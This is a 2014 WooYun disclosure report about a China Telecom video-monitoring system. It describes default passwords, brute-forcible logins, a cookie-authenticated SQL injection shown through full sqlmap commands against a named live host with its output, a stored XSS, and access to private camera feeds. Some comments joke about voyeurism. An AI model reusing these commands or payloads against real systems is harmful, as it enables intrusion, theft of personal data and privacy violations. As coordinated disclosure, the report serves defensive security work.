当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078416

漏洞标题:中国电信某视频监控系统存在默认密码且后台存在sql注入及存储型xss,大量账户及监控视频泄漏

相关厂商:中国电信

漏洞作者: kttzd

提交时间:2014-10-06 22:51

修复时间:2014-11-20 22:56

公开时间:2014-11-20 22:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-06: 细节已通知厂商并且等待厂商处理中
2014-10-11: 厂商已经确认,细节仅向厂商公开
2014-10-21: 细节向核心白帽子及相关领域专家公开
2014-10-31: 细节向普通白帽子公开
2014-11-10: 细节向实习白帽子公开
2014-11-20: 细节向公众公开

简要描述:

什么?妹子在洗澡!!

详细说明:

中国电信“平安商铺”视频看护系统
普通用户登录:http://pa.jsict.com/globeyes/user/index.jsp 没有验证码可以爆破
管理员用户登录:http://pa.jsict.com:8080/globeyes/admin/
从视频看护系统的文档得知,普通用户默认密码:123456 和111222 其中大量用户没有更改可爆破
试了试一个普通用户账户登录 test123 密码 123456
进来了
本来看了看后台,没有什么可以利用的就想放弃来的,但是最后让我找到了一处注入.....
后台注入要cookie,抓个包看一看。
注入:
sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9"

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=27516 AND 2666=2666
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=27516 AND (SELECT 7563 FROM(SELECT COUNT(*),CONCAT(0x7162797871,(SELECT (CASE WHEN (7563=7563) THEN 1 ELSE 0 END)),0x716d797371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=27516 AND SLEEP(5)
---
[19:33:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0


sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" --dbs

available databases [3]:
[*] globeyes
[*] information_schema
[*] test


sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" -D globeyes --tables

Database: globeyes
[57 tables]
+----------------------+
| Dswitcher            |
| Rdetail              |
| user                 |
| admin                |
| admin_log            |
| alarm_dispose        |
| alarm_setting        |
| area                 |
| child_terminal       |
| client_session       |
| defence_area         |
| dispmsg              |
| dispmsg_bak          |
| emergency_notify     |
| ensure_msg_queue     |
| feeset               |
| hd_info              |
| host_info            |
| input_channel        |
| maintenance_record   |
| manufacturer         |
| message_list         |
| message_recycle      |
| monitor_event        |
| multimedia_queue     |
| notify_service       |
| notify_service_temp  |
| partition_list       |
| police               |
| police_service       |
| police_watcher       |
| process_info         |
| process_list         |
| product              |
| saveinfo             |
| service_monitor      |
| session_check        |
| sms_log              |
| sms_queue            |
| software_version     |
| storage              |
| store_setup          |
| system_stat          |
| system_status        |
| tccs_session         |
| terminal             |
| terminal_log         |
| terminal_online_time |
| terminal_param       |
| test_table           |
| uptown               |
| user_fee             |
| user_log             |
| user_message         |
| voice_log            |
| voice_queue          |
| watcher_log          |
+----------------------+


管理账户在admin 普通用户在user
看一下里面有多少数据
sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" -D globeyes -T user --count

Database: globeyes
+--------+---------+
| Table  | Entries |
+--------+---------+
| `user` | 8547    |
+--------+---------+


sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" -D globeyes -T admin --count

Database: globeyes
+-------+---------+
| Table | Entries |
+-------+---------+
| admin | 197     |
+-------+---------+


看看里面都记录了什么
sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" -D globeyes -T user --columns

Database: globeyes
Table: user
[37 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| level          | tinyint(3)       |
| user           | varchar(64)      |
| address        | varchar(255)     |
| area_id        | int(11)          |
| balance        | int(11)          |
| birthday       | varchar(20)      |
| check_account  | varchar(32)      |
| city           | varchar(32)      |
| country        | varchar(32)      |
| create_date    | varchar(20)      |
| disk_size      | bigint(20)       |
| email          | varchar(128)     |
| finger_id      | varchar(32)      |
| fingerid       | varchar(32)      |
| from_platform  | varchar(32)      |
| gender         | tinyint(4)       |
| id             | bigint(20)       |
| idcard         | varchar(24)      |
| max_child_num  | int(11)          |
| max_device     | int(11)          |
| mobile         | varchar(64)      |
| mobile_service | tinyint(4)       |
| parent_id      | bigint(20)       |
| password       | varchar(128)     |
| pay_method     | tinyint(4)       |
| phone          | varchar(64)      |
| platform       | tinyint(4)       |
| province       | varchar(32)      |
| realname       | varchar(64)      |
| start_date     | varchar(20)      |
| status         | tinyint(4)       |
| stop_date      | varchar(20)      |
| store_time     | int(10) unsigned |
| test_user      | tinyint(4)       |
| used_space     | bigint(20)       |
| validate_type  | tinyint(4)       |
| zip            | varchar(8)       |
+----------------+------------------+


这个要是泄漏了跟查水表没什么区别....

漏洞证明:

随便找几个管理用户登录一下

视频监控.png


视频监控02.png


视频监控03.png


视频监控04.png


视频监控05.png


视频监控06.png


任意管理用户添加

视频监控添加用户.png


管理员好像能任意重置任何人的密码,未测试.
后台系统管理处软件版本发布一处xss

后台xss.png


从前台能访问....
http://pa.jsict.com:8080/globeyes/user/load.jsp?PG=1

后台xss02.png


附一个监控

监控系统07.png

修复方案:

你们比我懂

版权声明:转载请注明来源 kttzd@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-10-11 16:42

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-10-06 23:01 | hack雪花 ( 实习白帽子 | Rank:67 漏洞数:18 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    求地址 共享

  2. 2014-10-07 00:19 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    什么!妹子在洗澡?在哪里!